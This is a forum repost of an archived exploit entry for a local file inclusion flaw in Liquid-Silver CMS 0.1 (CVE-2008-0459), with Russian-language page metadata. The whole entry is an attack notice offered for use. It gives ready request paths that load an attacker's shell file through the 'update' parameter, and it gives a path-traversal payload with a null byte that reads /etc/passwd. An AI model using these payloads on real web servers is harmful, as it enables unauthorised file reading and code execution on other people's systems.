Exploit Liquid-Silver CMS 0.1 - 'update' Local File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
4976
Проверка EDB
  1. Пройдено
Автор
STACK
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-0459
Дата публикации
2008-01-23
Код:
####################################################################################
###### Liquid-Silver CMS   Local File Inclusion Vulnerabilities                #####
###### http://sourceforge.net/project/showfiles.php?group_id=171166            #####
###### author : Stack-Terrorist [v40]                                          #####
###### foor read a php file > ?update=[name of file iwthout php]               #####
###### for execute exploit does not write extention of file                    #####
######                                                                         #####
######                                                                         #####
###### exploit : /Script/update/index.php?update=/[name of file wthout php]    #####
######                                                                         #####
###### example : /Script/update/index.php?update=/home/user/shell              #####
######                                                                         #####
###### other files:    update=../../../../etc/passwd%00                        #####
######                                                                         #####
######  H-T Team , v4 Team  , Tryag , no-hack all my friend                    #####
####################################################################################

# milw0rm.com [2008-01-23]
 
Источник
www.exploit-db.com

Похожие темы